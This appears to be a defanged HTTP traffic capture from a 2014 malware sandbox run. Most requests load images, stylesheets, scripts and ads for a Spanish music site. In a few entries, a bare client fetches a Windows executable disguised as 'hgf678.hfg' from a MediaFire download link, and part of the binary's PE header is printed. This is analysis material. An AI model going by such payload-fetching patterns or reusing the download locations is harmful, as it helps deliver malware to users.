User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:29 GMT
Content-Type: image/gif
Content-Length: 573
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-23d"
Accept-Ranges: bytes
GET /Imagenes/f.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:29 GMT
Content-Type: image/gif
Content-Length: 531
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-213"
Accept-Ranges: bytes
GET /Imagenes/e_17.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:29 GMT
Content-Type: image/gif
Content-Length: 130
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-82"
Accept-Ranges: bytes
GET /Imagenes/i_13.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:29 GMT
Content-Type: image/gif
Content-Length: 156
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-9c"
Accept-Ranges: bytes
GET /Imagenes/i_28.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:30 GMT
Content-Type: image/gif
Content-Length: 48
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-30"
Accept-Ranges: bytes
GET /Imagenes/i-play.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:30 GMT
Content-Type: image/gif
Content-Length: 393
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-189"
Accept-Ranges: bytes
GET /Imagenes/ii_13.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:31 GMT
Content-Type: image/gif
Content-Length: 176
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-b0"
Accept-Ranges: bytes
GET /Imagenes/syij4.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:31 GMT
Content-Type: image/gif
Content-Length: 351
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-15f"
Accept-Ranges: bytes
GET /Imagenes/i_84.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:32 GMT
Content-Type: image/gif
Content-Length: 155
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-9b"
Accept-Ranges: bytes
GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Range: bytes=1460-
Unless-Modified-Since: Mon, 07 Apr 2014 17:00:48 GMT
If-Range: "5342d9c0-1ff32"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
Cookie: __utma=127640345.1684967166.1398081329.1398081329.1398081329.1; __utmb=127640345.1.10.1398081329; __utmc=127640345; __utmz=127640345.1398081329.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 206 Partial Content
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:43 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 129406
Last-Modified: Mon, 07 Apr 2014 17:00:48 GMT
Connection: keep-alive
ETag: "5342d9c0-1ff32"
Content-Range: bytes 1460-130865/130866
vascript" src="Js/Funciones.js"></script>. <script type="text/javascript" src="Js/swfobject.js"></script>. . </head>. <body onload="iniciarPlayList(0, 1);">.. <div id="Aero"></div>. <div id="Overlay"></div>.. <div style="text-align:center;">. <div align="center" id="cuerpo">. <div id="cabecera">. <div id="logo"></div>. <div id="cabecera_abc">. <div id="c_1">. <div style="height:5px;#height:2px; _height:0px;"><img src="" height=1 style="display:none"></div>. <div align=right style=" *margin-top:-13px; _margin-top:10px; padding-left:285px; color: #f4f4f4;"> . <form action="acceso.php" method="post">.. <span class="superior-lg" style="margin-right:3px"> . <input name="Email" onfocus="if (this.value == 'Email'). this.value = '';" onblur="if (this.value == ''). this.value = 'Email'
<<< skipped >>>
GET /download/icv44fwz74gj29z/hgf678.hfg HTTP/1.1
User-Agent: Mozilla/4.0
Host: VVV.mediafire.com
Cookie: ukey=d744vnx8vv7np87ybpq2qnf92ov8hquc
HTTP/1.1 302
Date: Mon, 21 Apr 2014 11:57:21 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Cache-control: no-cache
Expires: 0
Location: hXXp://download627.mediafire.com/lmpb2mr1rucg/icv44fwz74gj29z/hgf678.hfg
Pragma: no-cache
Server: MediaFire
Access-Control-Allow-Origin: *
0..
GET /Estilos/CSS.Sitio.css HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:27 GMT
Content-Type: text/css
Content-Length: 16269
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-3f8d"
Accept-Ranges: bytes
.#WARNING_BANNER_BASIC{. display:none !important;. visibility: hidden !important;.}.#WARNING_BANNER_LIVE{. display:none !important;. visibility: hidden !important;.}..body {.font-size:11px;.font-family:Arial;.background: url('../Imagenes/f.gif') #fff; background-repeat: repeat-x;.margin:0.}..anuncio{width:300px;height:250px;margin-bottom:3px;position:relative;margin-top:5px;float:left;margin-left:5px}#anuncios...abc { background-image:url('../Imagenes/i_08.gif'); border: 1px solid #f9f7f7; border-bottom: 0px ; }..#Abecdr{.padding: 0;.text-decoration: none; .background: transparent;.voice-family: "\"}\"";.voice-family: inherit;.padding-left: 5px;.}..#Abecdr div{.display:indivne;.margin:0 2px 0 0;.padding:0;.text-transform:uppercase;.}...#Abecdr a{.float:left;.color: #666;.font: bold 11px Verdana;.margin:0 12px 0 0;...padding:0 0 0 5px;.text-decoration: none; .}.#Abecdr a:hover {color: #000;}.....Listado{.float:left;.border-bottom: 1px solid #cacaca;.border-bottom-width: 0;.width: 255px;.}..* html .Listado{.width: 250px;.}...Listado ul{.padding: 0;.margin: 0;.list-style-type: none;.}...Listado li{.width: 100%;.padding: 5px 3px;.display:block;.font: normal 9px Verdana;.color: #666666;.text-decoration: none;.border-bottom: 1px solid #C0C0C0;.}...Listado a{.font: normal 12px Verdana,Arial;.color: #595959;.text-decoration: none;..}...Listado a:hover{.font: normal 12px Verdana,Arial;.color: #000;.text-decoration: none;.}...Listado li a:hover{.font: normal 12px Verdana,Arial;.color: #242424;.text-decorati
<<< skipped >>>
GET /Estilos/CSS.Panel.css HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:27 GMT
Content-Type: text/css
Content-Length: 735
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-2df"
Accept-Ranges: bytes
.Menu-p{..padding: 5px 0;..margin-left: 0;..font: bold 11px Arial;..border-bottom: 1px solid #ccc;..list-style-type: none;..text-align: left; ..}...Menu-p li{..display: inline;..margin: 0;..}...Menu-p li a{..text-decoration: none;..padding: 5px 7px;..margin-right: 0px;..border: 1px solid #ccc;..border-bottom: none;..background-color: #f4f4f4;..color: #666;..}...Menu-p li a:visited{..color: #2d2b2b;..}...Menu-p li a:hover{..background-color: #fff;..background-position:0% -8px;..color: #2d2b2b;..}.....Menu-p li.selecc a{..position: relative;..top: 1px;..padding-top: 8px;..background-color: #fff;..color: #000;..}..#cont_menu {margin-top:-12px;_margin-top:-19px;#margin-top:-20px;padding:10px; border:1px solid #ccc;}....
GET /Js/Funciones.js HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:27 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 8384
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-20c0"
Accept-Ranges: bytes
// Coddigo Javascript By Andy (^_^)!..var cabecera = '<span style="padding-right:50px; height:16px"><a href="#cerrar" onclick=" ocultar(); return false"><img border=0 align=right src="./Imagenes/x-i.gif"></a></span><div style="width:450px; padding:30px">';..function limitesPantalla() {. .. if(typeof( window.innerWidth ) == 'number' ) .. {return window.innerWidth "-" window.innerHeight; .. }else if(document.documentElement && (document.documentElement.clientWidth||document.documentElement.clientHeight)).. {return document.documentElement.clientWidth "-" document.documentElement.clientHeight;.. }else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ).. {return document.body.clientWidth "-" document.body.clientHeight;.. }return null;..}..function arreglaraResolucion(capa){...var resolucion = limitesPantalla().split("-");...$(capa).style.width = Math.floor(resolucion[0]) "px";...$(capa).style.height = Math.floor(resolucion[1]) "px";..}....function MuestraCapa(){... arreglaraResolucion("Aero");... $("Aero").style.display = "block";....$("Overlay").style.display = "block"; ... ..}..function ocultar(){.. $("Aero").style.display = "none";.. $("Overlay").style.display = "none";..}..function ReportarError(){...MuestraCapa();....var FoHTML = '<div style="width:500px"><div id="Errors"></div>Email:<br /><input class="CampoLg" id="rep_Email" style="font:normal 12px Arial; width:450px" oncli
<<< skipped >>>
GET /Imagenes/i-2i.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:28 GMT
Content-Type: image/gif
Content-Length: 1097
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-449"
Accept-Ranges: bytes
<<< skipped >>>
GET / HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:29 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 130866
Last-Modified: Mon, 07 Apr 2014 17:00:48 GMT
Connection: keep-alive
ETag: "5342d9c0-1ff32"
Accept-Ranges: bytes
.<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">. <head>. <title>Musica Online</title>. <meta name='title' content="Musica Online">. <meta name='description' content="Musica Online tiene un gran repertorio de musica en linea, disfruta de la canciones que mas suenan en la disco, mira los videos y letras de tus canciones favoritas">. <meta name='keywords' content="MUSICA ONLINE,ESCUCHAR MUSICA, MUSICA EN LINEA">. <meta name="robots" content="index, follow"/>. <meta name="author" content="Musica Online"/>. <meta name="copyright" content="Musica Online 2012 Derechos Reservados"/>. <meta http-equiv="Content-Language" content="es"/>. <meta name="revisit" content="1 days"/>. <meta NAME="googlebot" content="index, follow" />. <base href="hXXp://esmusicon.com/" />. <META HTTP-EQUIV="Content-Type" content="text/html; charset=utf-8" />. <link href="./Estilos/CSS.Sitio.css" rel="stylesheet" type="text/css" />. <link href="./Estilos/CSS.Panel.css" rel="stylesheet" type="text/css" />. <script type="text/javascript" src="Js/Principal.js"></script&g
<<< skipped >>>
GET /atoms/c8/3b/51/0b/c83b510be812cec3ea3446015eb76621.gif HTTP/1.1
Accept: */*
Referer: hXXp://u.pub-fit.com/2454.html?s=300x250
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: content.yieldmanager.edgesuite.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Apache
ETag: "c83b510be812cec3ea3446015eb76621:1362040945"
Last-Modified: Thu, 28 Feb 2013 08:42:25 GMT
Accept-Ranges: bytes
Content-Length: 12790
Content-Type: image/gif
Cache-Control: max-age=31536000
Date: Mon, 21 Apr 2014 11:57:30 GMT
Connection: keep-alive
<<< skipped >>>
GET /atoms/c5/f8/76/0e/c5f8760e7af5ff75c20de7295e421a6f.png HTTP/1.1
Accept: */*
Referer: hXXp://u.pub-fit.com/2454.html?s=300x250
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: content.yieldmanager.edgesuite.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Apache
ETag: "c5f8760e7af5ff75c20de7295e421a6f:1369930580"
Last-Modified: Thu, 30 May 2013 16:16:20 GMT
Accept-Ranges: bytes
Content-Length: 8452
Content-Type: image/png
Cache-Control: max-age=31536000
Date: Mon, 21 Apr 2014 11:57:44 GMT
Connection: keep-alive
<<< skipped >>>
GET /atoms/fa/1b/6b/97/fa1b6b9794e5b240bbad703d9f4c9a12.png HTTP/1.1
Accept: */*
Referer: hXXp://u.pub-fit.com/2454.html?s=300x250
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: content.yieldmanager.edgesuite.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Apache
ETag: "fa1b6b9794e5b240bbad703d9f4c9a12:1367856632"
Last-Modified: Mon, 06 May 2013 16:10:18 GMT
Accept-Ranges: bytes
Content-Length: 15267
Content-Type: image/png
Cache-Control: max-age=31536000
Date: Mon, 21 Apr 2014 11:57:44 GMT
Connection: keep-alive
<<< skipped >>>
GET /swidget/h20d2qja0b7p.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: whos.amung.us
Connection: Keep-Alive
HTTP/1.1 303 See Other
Date: Mon, 21 Apr 2014 11:57:46 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://widgets.amung.us/small/05/567.png
Set-Cookie: uid=CgH9JVNVB7ouXzqMKw CAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=atta; path=/
0..
GET /lmpb2mr1rucg/icv44fwz74gj29z/hgf678.hfg HTTP/1.1
User-Agent: Mozilla/4.0
Connection: Keep-Alive
Cookie: ukey=d744vnx8vv7np87ybpq2qnf92ov8hquc
Host: download627.mediafire.com
HTTP/1.1 200 OK
Server: LRBD-bigdownload-
Date: Mon, 21 Apr 2014 11:57:22 GMT
Connection: close
Accept-Ranges: bytes
Content-transfer-encoding: binary
Content-Length: 162416
Content-Disposition: attachment; filename="hgf678.hfg"
Content-Type: application/x-dosexec
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......].......................p...............rich............................PE..L...h........................ ....................@..................................U..........................................$........................4...$...$...................$...............................................................text............................... ..`.data....!..........................@....rsrc.p."...........................@..@l.[J.............SVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
<<< skipped >>>
GET /imp?Z=300x250&s=5397210&_salt=3369660399&B=10&H=&u=http://u.pub-fit.com/2454.html?s=300x250&M=5&r=0 HTTP/1.1
Accept: */*
Referer: hXXp://u.pub-fit.com/2454.html?s=300x250
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ads.yahoo.com
Connection: Keep-Alive
Cookie: B=7atjd219la1t9&b=3&s=iu
HTTP/1.1 200 OK
Date: Mon, 21 Apr 2014 11:57:29 GMT
Server: YTS/1.20.13
X-RightMedia-Hostname: raptor0973.rm.bf1.yahoo.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: ih="b!!!!#!L>v#!!!!#>gR*'"; path=/; expires=Wed, 20-Apr-2016 11:57:29 GMT
Set-Cookie: vuday1=IsXSs!6tS(i!$_D; path=/; expires=Tue, 22-Apr-2014 00:00:00 GMT
Set-Cookie: uid=uid=1d62eb12-c94c-11e3-827d-cb8df2a57ad7&_hmacv=1&_salt=1637232578&_keyid=k1&_hmac=87d298b7e64f01dc00e33f6d4df37b9a35caedfa; path=/; expires=Wed, 21-May-2014 11:57:29 GMT
Set-Cookie: liday1=iSs5t#Kdr=!6tS($AOnF; path=/; expires=Tue, 22-Apr-2014 00:00:00 GMT
Set-Cookie: RMBX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: RMBX=7atjd219la1t9&b=3&s=iu&t=110; path=/; expires=Thu, 21-Apr-2016 11:57:29 GMT; domain=.yahoo.com
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Vary: *
Last-Modified: Mon, 21 Apr 2014 11:57:29 GMT
Expires: Mon, 21 Apr 2014 11:57:29 GMT
Pragma: no-cache
Content-Type: application/x-javascript
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
2cf..document.write('<a target=\"_blank\" href=\"hXXp://ads.yahoo.com/clk?3,eJydjV9rgzAUxT-Nb07y56bNCHuI1cigCSso2.rWOWu0cRVMseunn1LpB9jhcvhd7j0cTAXDz9V3dUAY1hyvCAgMjANhR4QgREIIQsmacMxXOCz9j8t8fyjqDdw-TrGcpZt9uZN31bO93vmNz75JqFXtckYN0wumFgb5f8VpFJ8XnvrGqTrhcqi4s2kRP94SdTLt7vaZS9i-a2Yy7XWunP7Fjc6KcZuXdN8VV9PWSBPjzPhIvoSh9b4PqAyImuYS9Zevp2Pjo.LcTTsBBpH1nQuoGgKaUISuhKE.WBteBA==,\"><img border=\"0\" alt=\"\" height=\"250\" width=\"300\" src=\"hXXp://content.yieldmanager.edgesuite.net/atoms/c8/3b/51/0b/c83b510be812cec3ea3446015eb76621.gif\"></img></a>');.var rm_data = new Object();.rm_data.creative_id = 24759736;.rm_data.offer_type = 49;.rm_data.entity_id = 882998;..if (window.rm_crex_data) {rm_crex_data.push(24759736);}..0..0......
<<< skipped >>>
GET /get-user-id?ver=2&s=5397210&ts=1398081463&sig=076f97ecda33a47a HTTP/1.1
Accept: */*
Referer: hXXp://u.pub-fit.com/2454.html?s=300x250
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ads.yahoo.com
Connection: Keep-Alive
Cookie: B=7atjd219la1t9&b=3&s=iu; RMBX=7atjd219la1t9&b=3&s=iu&t=110; ih="b!!!!#!L>v#!!!!#>gR*'"; vuday1=IsXSs!6tS(i!$_D; uid=uid=1d62eb12-c94c-11e3-827d-cb8df2a57ad7&_hmacv=1&_salt=1637232578&_keyid=k1&_hmac=87d298b7e64f01dc00e33f6d4df37b9a35caedfa; liday1=iSs5t#Kdr=!6tS($AOnF
HTTP/1.1 200 OK
Date: Mon, 21 Apr 2014 11:57:43 GMT
P3P: policyref="hXXp://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Cache-Control: private
Content-Type: text/javascript
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
Server: YTS/1.20.13
0......
GET /st?ad_type=ad&ad_size=300x250&section=5397210 HTTP/1.1
Accept: */*
Referer: hXXp://u.pub-fit.com/2454.html?s=300x250
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ads.yahoo.com
Connection: Keep-Alive
Cookie: B=7atjd219la1t9&b=3&s=iu; RMBX=7atjd219la1t9&b=3&s=iu&t=110; ih="b!!!!#!L>v#!!!!#>gR*'"; vuday1=IsXSs!6tS(i!$_D; uid=uid=1d62eb12-c94c-11e3-827d-cb8df2a57ad7&_hmacv=1&_salt=1637232578&_keyid=k1&_hmac=87d298b7e64f01dc00e33f6d4df37b9a35caedfa; liday1=iSs5t#Kdr=!6tS($AOnF
HTTP/1.1 200 OK
Date: Mon, 21 Apr 2014 11:57:44 GMT
Server: YTS/1.20.13
X-RightMedia-Hostname: raptor0230.rm.bf1.yahoo.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Vary: *
Last-Modified: Mon, 21 Apr 2014 11:57:44 GMT
Expires: Mon, 21 Apr 2014 11:57:44 GMT
Pragma: no-cache
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
1000../* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";var rm_md_purl_det=0;var rm_md_purl_dec=0;var rm_md_purl_st_ref=0;var rm_st_referrer="";var rm_md_purl_unknown=0;var rm_enable_ck_mp=0;var rm_ck_mp_cu="";rm_md_purl_det = "4"; rm_md_purl_dec = "3"; rm_md_purl_st_ref = "5"; rm_st_referrer = "hXXp://u.pub-fit.com/2454.html?s=300x250"; rm_md_purl_unknown = "0"; rm_enable_ck_mp = 1; rm_tag_type = "ad"; rm_url = "hXXp://ads.yahoo.com/imp?Z=300x250&s=5397210&_salt=1531230313";rm_ck_mp_cu = "hXXp://ads.yahoo.com/get-user-id?ver=2&s=5397210&ts=1398081464&sig=616b1a54b12efba8";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if(rm_crex_data.length>0){rm_url ="&X=";for(var i=0;i<rm_crex_data.length;i ){rm_url =rm_crex_data[i];if(i!=rm_crex_data.length-1){rm_url =",";}}}}else{rm_pb_data.push(rm_crex_data.pop());rm_url ="&X=";for(var i=0;i<rm_pb_data.length;i ){rm_url =rm_pb_data[i];if(i!=rm_pb_data.length-1){rm_url =",";}}rm_url ="&Y=pb";}var flash=new Object();flash=flashDetection();if(cookiesEnabled()){rm_url =(flash.installed?"&B=10":"&B=12");}else{rm_url =(flash.installed?"&B=11":"&B=13");}if(!flash.installed||rm_ban_flash==1){rm_url ="&m=2";}var url='';try{if(rm_tag_type=="ad"){if(top==self){url=encodeURIComponent
<<< skipped >>>
GET /get-user-id?ver=2&s=5397210&ts=1398081464&sig=616b1a54b12efba8 HTTP/1.1
Accept: */*
Referer: hXXp://u.pub-fit.com/2454.html?s=300x250
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ads.yahoo.com
Connection: Keep-Alive
Cookie: B=7atjd219la1t9&b=3&s=iu; RMBX=7atjd219la1t9&b=3&s=iu&t=110; ih="b!!!!$!L>v#!!!!#>gR*'!N94N!!!!#>gR*5"; vuday1=IsXSsIsXSs!6tS(%T)C/; uid=uid=1d62eb12-c94c-11e3-827d-cb8df2a57ad7&_hmacv=1&_salt=1637232578&_keyid=k1&_hmac=87d298b7e64f01dc00e33f6d4df37b9a35caedfa; liday1=iSs5t)ghL-1^Rkd#Kdr=!6tS(V!G3c
HTTP/1.1 200 OK
Date: Mon, 21 Apr 2014 11:57:44 GMT
